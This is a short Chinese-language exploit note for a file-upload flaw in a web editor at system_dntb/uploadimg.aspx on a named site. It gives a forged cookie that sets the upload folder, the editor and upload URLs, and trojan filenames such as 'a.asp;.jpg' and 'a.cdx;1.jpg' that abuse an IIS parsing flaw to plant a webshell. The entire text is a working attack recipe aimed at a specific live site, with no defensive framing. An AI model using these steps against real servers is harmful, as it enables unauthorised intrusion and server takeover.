漏洞文件system_dntb/uploadimg.aspx
由于他是验证cookie来得出上传后的路径,这样我们可以用cookie欺骗工具。
cookie:UserType=0; IsEdition=0; Info=1; uploadFolder=../system_dntb/Upload/;
路径可以修改,只是权限够,上传后改名为1.asp;.jpg利用iis解析漏洞。
编辑器目录地址http://www.chouwazi.com/system_dntb/
编辑器上传地址http://www.chouwazi.com/system_dntb/uploadimg.aspx
文件上传后目录http://www.chouwazi.com/system_dntb/Upload/
上传木马类型a.cdx;1.jpg a.asp;.jpg